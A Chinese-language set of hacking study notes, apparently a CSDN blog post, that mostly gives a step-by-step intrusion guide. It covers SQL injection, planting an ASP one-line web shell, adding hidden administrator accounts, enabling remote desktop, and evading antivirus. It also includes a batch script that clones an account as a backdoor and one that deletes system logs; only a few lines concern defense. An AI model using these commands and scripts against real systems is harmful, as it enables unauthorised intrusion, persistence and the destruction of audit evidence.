黑客攻防web安全實戰詳解筆記

若有不足，歡迎指出，謝謝！

-----------------------------------------

1，url傳值

  GET傳值：其傳遞的值會附加到url上
  POST傳值：其傳遞的值不會加載url上
2,常見的數據庫類型：access（常做爲小企業、網站的數據庫，通常都是access+asp組合，通常以.mdb/.asp/.asa爲擴展名，
置於網站目錄下）、mysql（通常不在網站目錄下）、sql server、oracle、nosql
3，應用服務
·文件服務器：如NOVELL的netware
·數據庫服務器：
·郵件服務器：sendmail/postfix/qmail/microsoft exchange/lotus domino
·網頁服務器：如：apache/thttpd/iis
·ftp服務器：pureftpd/proftpd/wu-ftpd/serv-u
·域名服務器：bind9
·代理服務器：如squid cache

網站信息收集：網上在線搜索，whois，域名註冊的地方搜索
拓撲探測：服務器、防火牆、路由器 如軟件：VirsualROUTE

經常使用的端口掃描技術
tcp connect(),返回成功，端口屬於偵聽狀態
tcp SYN ,返回SYN|ACK 屬於開放，返回RST 端口關閉
tcp FIN ,返回開端的忽略請求包，關閉用適當的RST回覆，有的系統都忽略
在線端口掃描

搜索引擎基本語法
filetype：擴展名    搜索結果僅返回有特定文件類型的網頁
info：url           返回須要查詢網站的一些信息
intitle:xxx         返回標題裏有xxx的網頁
inurl：sss          在url裏包含了sss的網頁

搜索後臺（inurl:admin/login.asp)/site:xx.com intext:管理/
site:xx.com intext:用戶名 密碼/site:xx.com intext:login/
site:xx.com intext:manage/site:xx.com intext:admin/
site:xx.com intitle:後臺/site:xx.com intitle:管理/

網站目錄：index of
轉到父目錄：to parent directory

一次完整的滲透入侵步驟：
#在虛擬機裏下載的網站源
*找到能夠sql注入的網頁，在目標網頁中任意點擊，在url後加入'/and 1=1/and 1=2,從新加載頁面，若是頁面返回不正常，則必定存在sql漏洞
**根據經驗找到後臺url，使用弱口令嘗試
*用啊D檢測工具檢測，獲得後臺的用戶名 密碼，檢測後臺登錄網址
*登陸成功，在系統管理裏網頁名稱輸入："%><%eval request("123456")%><%’，一句話木馬，保存在/inc/setup.asp文件裏
*用菜刀（木馬鏈接器)鏈接網頁文件，如http://localhost/inc/set.asp,密碼就是123456，在文件管理內能夠管理該網站
*右鍵虛擬終端，建立用戶：net user test1 1234 /add,提權：net localgroup administrators test1 /add
*打開遠程鏈接的3389端口：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
*用用戶名test1和密碼1234鏈接網站的服務器電腦，就能夠控制對方電腦了
*留後門和清腳印（清日誌）
  在創建用戶時用net user test1$ 1234 /add ，管理員在用net user查看系統用戶時就看不見了
  運行regedit， 進入HKEY_LOCAL_MACHINE--SYSTEM--CurrentControlSet--Control--Terminal Server--Wds--rdpwd--tds--tcp,將PortNumber從默認的
3389改成其餘的，如13389。
  進入到HKEY_LOCAL_MACHINE--SYSTEM--CurrentControlSet--Control--Terminal Server--WinStations--RDP-Tcp，將PortNumber改成13389.
  下次訪問就用13389端口鏈接
 使用日誌清除工具。

ip地址轉爲10進制：如：220.181.18.155=220*256*256*256+181*256*256+18*256+155=3702854299
 
url：http://www.162.com:123456@3702854299  表示用戶名是www.162.com,密碼是123456，請求3702854299，@後的纔是真正訪問機頁面
通常網頁是不會顯示前面的用戶名和密碼的，這個是用來迷惑用戶的釣魚鏈接

Unicode編碼：樣式爲「%5c%23」

host文件：修改host文件域名對應的ip地址，能夠訪問到不一樣的地方去

.ocx 控件文件

--------------

sql注入

count（）：函數肯定字段名和表名

確認表名：http://127.0.0.1/login.asp?uname=admin' and(select count(*) from data)>0 and 'a'='a   amd count值大於0表示這個表中有值，既存在表。

確認字段：select count(uname) from data>0   //uname是我猜想的可能存在的字段名，注意經常使用的用戶名/密碼字段名，若是頁面返回正確，則存在該字段名

len(）函數：確認密碼/用戶名的長度

len（upass）(>、=)1

二分法：len（upass）<16 / len(upass)<8

mid(字符串，起始位置，長度)函數：mid（'abcd',2,2)表示從第二位開始的兩個字符，獲得的結果就是bc

也能夠模糊查詢：mid(upass,1,1)>'a'  或mid(upass,1,1)>'z'

用戶名：admin   密碼：admin的MD5加密

Trim(),去掉空格

sql漏洞防護：捕獲關鍵詞：select，where，union等出力

跨站腳本攻擊（xss）防護：用戶輸入的數據都要過濾，將特殊字符（如尖括號之類的)轉化爲html特殊字符集裏的字符，就不會當成代碼來執行（如‘>’==「&gt」）

後門免殺，殺毒軟件是根據特徵碼來判斷是否爲病毒文件的

* 第一種放方法 ，先把asp代碼編碼，執行時在解碼，如Script Encoder 加密後的文件以<%@LANDUAGE=VBScript.Encoder %>開頭

*第二種方法，利用ASP中的execute函數，使用來執行字符串的，如execute("response.write(""test"")")==》response.write("test"),因爲execute函數裏的代碼是字符串，故遇到雙引號要雙寫）

-----------------------------

一句話木馬：

<%eval request("123456")%>

<%execute request("1")%>

-------------------

圖片asp木馬：copy 1.jpg /b + 1.asp /a asp.jpg  ,/b是指定以二進制格式複製、合併文件，參數/a指定以ASCII格式複製、合併文件

配置不當提高權限，入侵者常關注的目錄：

C:\Document and settings\

C:\Document and settings\All Users

C:\Document and settings\All Users\【開始】菜單\程序、

C:\Document and settings\Administrator\桌面

C:\Document and settings\All Users\Application Data\symantec\PCanywhere

C:\Program Files\

D:\Program Files\

C:\Program Files\Internet Explorer

C:\Program Files\Serv-U\

C:\Program Files\java web start\

C:\Program Files\mocrosoft sql server\

C:\WINNT\SYSTEM32\CINFIG\

C:\winnt\system32\inetsrv\data\(徹底控制權限）

C:\prel\（有寫權限）

c:\temp\

c:\mysql\

c:\php\（有寫權限）

 

@Windows 2000\xp 的Runas命令，容許用戶用其餘權限運行特定的工具和程序，而不是當前登陸用戶所提供的權限

@FAT32和NTFS的區別：

fat（文件分配表）意義在於對硬盤分區的管理，常見的有FAT16/FAT32;

NTFS：1）增長了計算機的安全性，能夠對單個文件或文件夾設置權限

             2）只爲寫入的文件部分分配磁盤空間

             3）元數據恢復記錄，可在計算機斷電或發生其餘系統問題時儘快恢復信息

             4）在重啓計算機以後不須要運行chkdsk.exe硬盤自檢工具便可馬上訪問卷，可用來監控和控制單個用戶使用的磁盤空間量

              5）最大驅動器容量遠大於fat最大容量，順驅動器容量的增長，性能不降低

 

其餘第三方提權介紹：

serv-u提權：使用serv-u，用戶能夠將任何一臺pc設置爲服務器，就能夠是用ftp協議，在同一網絡上的pc機鏈接服務器，進行文件或目錄的操做，serv-u>3.x的默認端口是43958，默認管理員是LocalAdministrator,默認密碼是#l@$ak.lk;0@p;                   serv-u除了密碼漏洞外還有本機溢出和servUDaemin.ini文件覆蓋

PcAnywhere提權：這是一個遠程控制軟件，密碼保存在軟件目錄下的CTF文件裏，解密破解獲得密碼

VNC提權：是一個遠程控制工具，默認端口是5900,5901,5902，密碼保存在註冊表HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WINvnc4\password中，解密獲得密碼

Radmin提權：遠程控制軟件，默認端口是4899，密碼爲空。密碼註冊表：HKEY_LOCAL_MACHINE\SYSTEM\RAmin\V2.0\Server\paremeters\Parameter；端口註冊表：HKEY_LOCAL_MACHINE\SYSTEM\RAmin\V2.0\Server\paremeters\port

搜狗提權：目錄默認是可寫的，

pinyinup.exe 是搜狗 輸入法的的自動升級程序，替換後，下次自動升級就會調用提權程序
ImeUtil.exe  是開機啓動程序，替換後，重啓啓動就會運行提權程序
popup.dll 是運行時加載的一個文件，替換後，就會在運行時執行提權操做
dll劫持：將軟件運行時執行的dll文件替換爲提權程序，加載程序時，提權操做也就執行了，這種行爲刀座dll劫持

lcx端口轉發：反向連接，用於外網pc機不能鏈接內網機但內網機能夠鏈接外網機

DOS:磁盤操做系統，dos命令是面向磁盤的操做命令

DOS:denial of server 拒絕服務,

DDOS::Distributed Denial of Service，分佈式拒絕服務，將多個計算機聯合起來攻擊一個或多個目標

tcp/ip：Transmission Control Protocol/Internet Protocol,傳輸控制協議/網絡互聯協議

網馬隱藏：

使用框架：<iframe src=「木馬頁面」 width="0" height="0"></iframe>
不算漏洞的漏洞：IE瀏覽器，若是在一個圖片文件裏有html代碼，就會解析並執行這些代碼
殺毒軟件是檢測指定位置的代碼是否與數據庫裏保存的病毒特徵碼一致

加殼技術：將程序代碼加密，在程序代碼開始的部分插入解密代碼，執行時就解密程序在運行；

壓縮殼（帶有壓縮功能的殼）：這樣的加殼技術會使程序的體積變大，應用壓縮技術，通過加殼的程序反而比沒有加殼的程序小

花指令（沒有意義的代碼），將代碼開頭插入（jmp）跳轉到無用的空間（通常在程序結尾處）執行花指令（inc eax&dec eax==eax加1和減1），而後再回到開頭執行原來的代碼，這樣全部的代碼位置會向後移動，殺毒軟件的指定位置的代碼就變了。

rootkitt是一種特殊的惡意軟件，它的功能是在安裝目標上隱藏自身及指定的文件、進程和網絡連接等信息，比較多見到的是Rootkit通常都和木馬、後門等其餘惡意程序結合使用。檢測rookit的工具備IceSword和Darkspy105

基於內網的入侵

內網又稱局域網（local area network,LAN)主要技術要素是：網絡拓撲（總線，星型，環形，樹形，混合型），傳輸介質（有線或無線）與介質訪問控制方法（以太網，令牌環網，FDDI網和無線局域網）

旁註的意思是：利用同服務器的其餘網站的漏洞入侵，以後得到該網站的控制權

C段的通常認爲是IP分類中的C類段地質類，可是在黑客術語中C段的意思是同網段服務器入侵，對目標服務器處於同一網段的其餘服務器進行入侵，在經過內網滲透對目標服務器入侵； 同網段是指：如目標ip思10.0.12.18，那麼10.0.12.1~10.0.12.255是同網段的，常見於安全性極高的帶大型網站 {c段在線查詢}

域：將多個計算機聯合，用戶帳號，密碼在同一個數據庫裏，一個的用戶能夠用不一樣的電腦登錄本身的帳號；在域內訪問其餘機器，再也不須要被訪問機器的許可（加入域要獲得域管理者的許可，也能夠由與管理者添加用戶）

內網信息刺探：

ipconfig /all 得到主機網卡信息
net view 顯示當前域或工做組中的計算機列表
net view /domain [:domainname] 查看指定計算機可用的域
net user /domain 查看用戶列表
net group "domain admins" /domain 查看域管理組成員
net user 管理員名 /domain 獲取域管理員信息
net /help 或net ? 獲取net可操做對象
net user /help或？ 獲取net user的具體使用方法
 ARP協議：經過目標設備的IP地址，查詢目標設備的MAC地址；

互聯網的通訊是基於IP地址的，但在一個局域網中的通訊是基於MAC地址的

局域網中的ip地址是變化的，例如學校網絡，每一次聯網，分配的IP地址都是不同的，因此用MAC地址通訊

ARP欺騙：攻擊者C在B給出相應前，迴應A，本身就是B，並將本身的MAC地址發送給A，那麼A就會覺得C的mac地址就是B的，並向C的MAC地址發送本來要發送給B的數據，同時，也能夠對B說本身是A

帳號後門

手工克隆帳號：直接給管理員權限的帳號能夠是用 命令或帳號管理查看帳號的真是權限，而克隆出來帳號卻沒法被上述方法查出  ；

實例：帳號guest被禁用，管理員沒法查看真實權限，但真實就是能夠用仍是管理員權限{圖形界面}

步驟一：以system權限打開註冊表編輯器：[HLM]\SAM/SAM\Domains\account\users\names

步驟二：克隆帳號：找到Administirs權限的類型，根據類型找到一樣的帳號配置健，打開復制裏面的數據，在找到帳號guest的權限類型，找到帳號配置健，粘貼數據，克隆完成

步驟三：禁用帳號：命令{net user guest /active:no}    而後就沒有操做了，我很疑惑被禁用的用戶怎麼還能用，就由於被克隆了嗎？

用命令行製做帳號後門

步驟一：編寫文件

編寫reg文件並保存爲delf.reg:

Windows Registry EdItor Version 5.00

[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5]

"f"=-

編寫bat文件，並保存爲zhdoor.bat

psu -p "regedit /s delf.reg" -i %1

psu -p "reg copy hklm\SAM\SAM\Domains\Account\Users\000001F4\f hklm\SAM\SAM\Domains\Account\000001f5\f" -i %1

net user guest /active:yes

net user guest 123456789

net user guest /active:no

del delf.reg

del psu.exe

del zhdoor.bat

步驟二：查看遠程主機/服務器中system進程的PID：經過工具, 通常PID=8

步驟三：上傳文件、登陸遠程主機

步驟四：執行bat文件 ,命令：winnt\zhdoor.bat 8

編寫BAT文件手工清除日誌

@del C:\WINNT\SYSTEM32\LOGFILES\*.*

@del C:\WINNT\SYSTEM32\CONFIG\*.EVT

@del C:\WINNT\SYSTEM32\DTCLOG\*.*

@del C:\WINNT\SYSTEM32\*.LOG

@del C:\WINNT\SYSTEM32\*.TXT

@del C:\WINNT\*.LOG

@del C:\WINNT\*.TXT

@del C:\CLEARLOG.BAT--------------------- 做者：supu21 來源：CSDN 原文：https://blog.csdn.net/fps1234567/article/details/81102715